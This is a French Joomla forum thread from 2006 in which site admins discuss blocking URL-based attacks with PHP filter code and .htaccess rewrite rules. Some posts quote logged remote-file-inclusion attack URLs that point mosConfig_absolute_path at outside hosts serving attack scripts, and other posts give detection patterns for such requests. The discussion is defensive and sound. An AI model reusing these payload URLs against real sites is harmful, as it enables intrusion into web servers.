Bloquer les attaque via URL : compléter le .htaccess

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • Bloquer les attaque via URL : compléter le .htaccess

    Bonjour à tous,

    Ayant été victime par 2 fois d'un hack (redirection vers un site turc qui doit être maintenant connu), j'ai entrepris les action suivantes :

    - installation Joomla! 1.0.11 (of course!)

    - installation en entête des fichier PHP du code de Phil Taylor pour filter les requêtes connues et utilisées pour hacker un site Joomla!

    Cette dernière opération, qui permet de recevoir par mail les tentavives de hack m'a fait froid dans le dos : c'est incroyable le nombre de tentatives par jours. De plusieurs dizaines (minima) à quelques centaines !!

    Face à ce constat j'ai mis en place un .htaccess avec les règles de filtrage disponibles dans le htaccess.txt fourni avec Joomla! 1.0.11.
    Depuis cette dernière manip, je n'ai plus eu de message me prévenant de tentative de hack (puisque les URL sont bloquées "en amont" par le serveur Apache).

    Jusqu'à ce jour où je constate à nouveau dans ma boite aux lettres, des messages de tentatives!

    D'où ma proposition :

    Ne pourrait-on pas créer un topic où il serait possible de compléter les règles à positionner dans le .htaccess en fonction de l'arrivée des nouvelles menaces?

    Si vous le voulez de peux fournir les URL des dernières tentatives. N'étant pas personnellement un spécialiste du .htaccess j'ai du mal à compéter moi-même les règles permettant le blocage de ces nouvelles URL!
    Dernière édition par frboulli à 01/10/2006, 13h18

  • #2
    Bonjour,
    je ne suis pas très compétent et du coup, je n'ai pas compris grand chose à ton sujet : c'est quoi une attaque par url ?

    Envoyé par frboulli
    - installation en entête des fichier PHP du code de Phil Taylor pour filter les requêtes connues et utilisées pour hacker un site Joomla!
    Je suis en train d'évaluer Joomla et je ne trouve pas trace de fichiers de cette sorte et en admettant que je les trouve il faut faire installation en en-tête, dis-tu, mais de quoi ?

    Commentaire


    • #3
      Le code que j'ai intégré en début des index.php et index2.php est celui-ci :
      <?php
      // ************* ANTI HACK BLOCK
      if (
      ereg('gif\?cmd',$_SERVER['REQUEST_URI']) ||
      ereg('gif&cmd',$_SERVER['REQUEST_URI']) ||
      ereg('jpg\?cmd',$_SERVER['REQUEST_URI']) ||
      ereg('jpg&cmd',$_SERVER['REQUEST_URI']) ||
      ereg('txt\?cmd',$_SERVER['REQUEST_URI']) ||
      ereg('txt&cmd',$_SERVER['REQUEST_URI']) ||
      ereg('txt\?',$_SERVER['REQUEST_URI'])
      )
      {
      // following line can be used to block IP Addresses if you use APF on a linus se
      rver
      // passthru('apf -d '.$_SERVER['REMOTE_ADDR']);
      $mailheaders .= "From: mail@mail.fr" . "\r\n";
      $msg = "Une tentative de hacking commise sur ".$_SERVER['HTTP_HOST']." par ".$_S
      ERVER['REMOTE_ADDR']." en appelant ".$_SERVER['REQUEST_URI'];
      @mail('mymail@mail.fr','HACKING TENTATIVE '.$_SERVER['REMOTE_ADDR'],$msg,$mail
      headers);
      die('<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
      <html><head>
      <title>403 Forbidden</title>
      </head><body>
      <h1>Forbidden</h1>
      <p>You don\'t have permission to access '.$_SERVER['REQUEST_URI'].'
      on this server.</p>
      </body></html>') ;
      }
      ?>
      Pendant une bonne semaine et après la modification du .htaccess ce code n'a plus rien filtré, signe que les règles du htaccess ont très bien fonctionné.
      Seulement depuis 2 jours le code ci-dessus m'envoi à nouveau des alertes de tentatives de hack! Si c'est inquiétant cela prouve tout de même que ce code filtre pa trop mal ce type d'attaques.
      Maintenant il serait assez génial en fait d'avoir un .htaccess pouvant filtrer toutes les attaques connues, non?

      Commentaire


      • #4
        Hello
        ce code tu l'as laissé tel que ?
        Tu as ton propre serveur ou bien tu es hébergé ?
        Es tu sur un serveur Linux ? Celui-ci dispose t-il d'APF ?

        Commentaire


        • #5
          J'ai effectivement repris le code tel que, en modifiant simplement l'adresse mail pour la positionner sur mon adresse d'admnistrateur du site.
          Ce site est hébergé chez OVH, en mutualisé (d'où le pb du globale_register à "On" qu'il n'est visiblement pas possible de modifier).

          Commentaire


          • #6
            ok frboulli,
            ta proposition me semble effectivement intéressante
            Envoyé par frboulli
            D'où ma proposition :

            Ne pourrait-on pas créer un topic où il serait possible de compléter les règles à positionner dans le .htaccess en fonction de l'arrivée des nouvelles menaces?

            Si vous le voulez de peux fournir les URL des dernières tentatives. N'étant pas personnellement un spécialiste du .htaccess j'ai du mal à compéter moi-même les règles permettant le blocage de ces nouvelles URL!
            maintenant il faudrait que ton sujet soit lu par des personnes compétentes qui pourraient se pencher sur cette suggestion.

            Commentaire


            • #7
              Bonjour,

              Envoyé par frboulli
              Le code que j'ai intégré en début des index.php et index2.php est celui-ci :


              Pendant une bonne semaine et après la modification du .htaccess ce code n'a plus rien filtré, signe que les règles du htaccess ont très bien fonctionné.
              Seulement depuis 2 jours le code ci-dessus m'envoi à nouveau des alertes de tentatives de hack! Si c'est inquiétant cela prouve tout de même que ce code filtre pa trop mal ce type d'attaques.
              Maintenant il serait assez génial en fait d'avoir un .htaccess pouvant filtrer toutes les attaques connues, non?
              Ben...
              Sans un apercu des urls qui te sont signalees c'est plutot difficile de savoir. Donc si tu pouvais nous envoyer un resume de ce que le script attrape en ce moment on y verrait plus clair.

              Cordialement,
              Richard.
              Association d'entraide de parents de multiples: http://www.jumeaux-et-plus.fr
              École de Musique de Villers-lès-Nancy: http://www.apm-villers.org

              Commentaire


              • #8
                Envoyé par rcognot
                Bonjour,


                Ben...
                Sans un apercu des urls qui te sont signalees c'est plutot difficile de savoir. Donc si tu pouvais nous envoyer un resume de ce que le script attrape en ce moment on y verrait plus clair.

                Cordialement,
                Richard.
                Ok

                http://www.monsite.fr/component/option,com_comprofiler/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_phttp://foro-bot.webcindario.com/lalis.txt?

                C'est la dernière de ce matin!!

                Commentaire


                • #9
                  Envoyé par frboulli
                  Ok

                  http://www.monsite.fr/component/option,com_comprofiler/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_phttp://foro-bot.webcindario.com/lalis.txt?

                  C'est la dernière de ce matin!!
                  Alors la Le hacker de merde

                  il a mal configure son script d'attaque, il y a des caracteres qui ont sautes, dont la fin de mosConfig_absolute_path=, ce qui fait que:
                  • son attaque est inoperante
                  • elle est incomplete pour les regles de rewrite qui du coup ne l'attrapent pas

                  Mais comme avec cette syntaxe il n'y a aucune chance que ca passe de toute facon tu peux dormir sur tes deux oreilles.

                  Bon, ben on a un bebe hacker sur les bras. 10 contre un que c'et un gamin d'un des hackers de la derniere fois

                  Cordialement,
                  Richard.
                  Association d'entraide de parents de multiples: http://www.jumeaux-et-plus.fr
                  École de Musique de Villers-lès-Nancy: http://www.apm-villers.org

                  Commentaire


                  • #10
                    Oui c'est ce que j'avais remarqué. J'en ai même vu d'autres dans le même style...

                    http://www.monsite.fr/component/option,com_comprofiler/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_p%20http://spartico.webcindario.com/m4ds.txt?

                    En tout cas çà met aussi en évidence la popularité de certains composants, du moins certains fichiers .php, sur l'échelle de la vulnérabilité! heureusement j'ai mis ce composant (CB) à jour.

                    Une idée pour filtrer ce type de requête via le .htaccess ? Parce que çà va finir par remplir mes mails

                    Commentaire


                    • #11
                      Je ne sais pas si c'est une bonne idée de mettre visible l'URL du Hacker, car, une autre personne mal intentionnée pourrait s'en servir pour attaquer des sites de gens paisibles.

                      La plupart des sites étant hackés par le passage de variables telles que mosConfig_absolute_path , n'hésitez pas à utiliser ce que propose RobS ici dans votre fichier .htaccess pour bloquer les tentatives les plus courantes.

                      De plus, placez un autre .htaccess sous /administrator/ avec un mot de passe dans un .htpasswd . C'est une protection supplémentaire, car les hackers attaquent souvent des fichiers .php placés dans les composants de l'Admin.

                      Commentaire


                      • #12
                        Envoyé par frboulli
                        Une idée pour filtrer ce type de requête via le .htaccess ? Parce que çà va finir par remplir mes mails
                        Non teste, mais si tu remplace:

                        Code:
                        RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
                        par :
                        Code:
                        RewriteCond %{QUERY_STRING} mosConfig_ [OR]
                        Ca devrait le faire. L'idee derriere la ligne initiale c' etait de proteger contre des lignes du type mosConfig_blahblah= (en gras les caracteres obligatoires).

                        Ce que je te propose devrais filtrer toutes les URLs qui contiennent simplement mosConfig_.

                        C'est un peu muscle comme methode, si tu fait une recherche de mosConfig_ toi-meme via le search de ton site ca va te le bloquer aussi. Mais bon...

                        Sinon on doit pouvoir faire la meme chose que ton script de detection via un regle de rewrite du style (pas testee non plus) a ajouter dans les regles deja presentes avant le RewriteRule:

                        Code:
                        RewriteCond %{QUERY_STRING} (gif|txt|jpg)(\?|\%3F|&|\%26|&amp;) [OR]
                        Pas teste encore, il y a peut-etre des ajustement a faire sur la protection des caracteres '&' (ajouter un \ devant?)

                        Les %3F et %26 ne sont rien d' autre que les caracteres ? et &.

                        Cordialement,
                        Richard.
                        Association d'entraide de parents de multiples: http://www.jumeaux-et-plus.fr
                        École de Musique de Villers-lès-Nancy: http://www.apm-villers.org

                        Commentaire


                        • #13
                          Envoyé par fan2
                          Je ne sais pas si c'est une bonne idée de mettre visible l'URL du Hacker, car, une autre personne mal intentionnée pourrait s'en servir pour attaquer des sites de gens paisibles.
                          C'est vrai et j'ai y ai bien pensé. Maintenant ce type d'attaque et sa forme sont de notoriété public, malheureusement ...
                          On peut aussi prévoir un autre système de collecte, plus privé.

                          Je vais aussi tester la manip de protéger via htaccess par un mot de passe le répertoire /admonistrator/.

                          Commentaire


                          • #14
                            >> rcognot

                            Merci pour les précisions. je vais tester en locale pour vérifier si cela fonctionne.
                            La restriction sur un search du mot clé mosConfig_ ne me paraît pas gênante.

                            Quand à la dernière règle que tu proposes ne va-t-elle pas tout simplement interdire le téléchargement des images (ex. sous EI via clic-droit "Enregistrer l'image sous...") ?

                            Sinon il va vraiment falloir que je me cogne la doc sur le fichier htaccess.
                            Avez-vous un site à me conseiller pour çà?

                            Commentaire


                            • #15
                              Envoyé par frboulli
                              Quand à la dernière règle que tu proposes ne va-t-elle pas tout simplement interdire le téléchargement des images (ex. sous EI via clic-droit "Enregistrer l'image sous...") ?
                              A priori non:
                              Code:
                              RewriteCond %{QUERY_STRING} (gif|txt|jpg)(\?|\%3F|&|\%26|&amp;) [OR]
                              se traduit par: toute url contenant: gif? ou gif& ou jpg? ou jpg& ou txt? ou txt&

                              C'est ni plus ni moins que ce que tu as deja dans ton index.php traduit sous forme de regle de rewrite. Par contre je ne garantis pas que ca marche sans adapter un peu, chaque systeme d'expressions regulieres ayant ses idiosyncrasies, a chaque fois je me plante de forme entre les regexp perl, les regexp shell, les regexp php... .

                              Cordialement,
                              Richard.
                              Association d'entraide de parents de multiples: http://www.jumeaux-et-plus.fr
                              École de Musique de Villers-lès-Nancy: http://www.apm-villers.org

                              Commentaire

                              Annonce

                              Réduire
                              1 sur 2 < >

                              C'est [Réglé] et on n'en parle plus ?

                              A quoi ça sert ?
                              La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

                              Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

                              Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
                              Comment ajouter la mention [Réglé] à votre discussion ?
                              1 - Aller sur votre discussion et éditer votre premier message :


                              2 - Cliquer sur la liste déroulante Préfixe.

                              3 - Choisir le préfixe [Réglé].


                              4 - Et voilà… votre discussion est désormais identifiée comme réglée.

                              2 sur 2 < >

                              Assistance au forum - Outil de publication d'infos de votre site

                              Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

                              Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

                              Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

                              UTILISER À VOS PROPRES RISQUES :
                              L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

                              Problèmes connus :
                              FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

                              Installation :

                              1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

                              Archive zip : https://github.com/AFUJ/FPA/zipball/master

                              2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

                              3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

                              4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

                              5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

                              6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
                              et remplacer www. votresite .com par votre nom de domaine


                              Exemples:
                              Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/
                              Pour executer le script: http://www..com/fpa-fr.php

                              Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/cms/
                              Pour executer le script: http://www..com/cms/fpa-fr.php

                              En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

                              Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
                              Voir plus
                              Voir moins
                              Travaille ...
                              X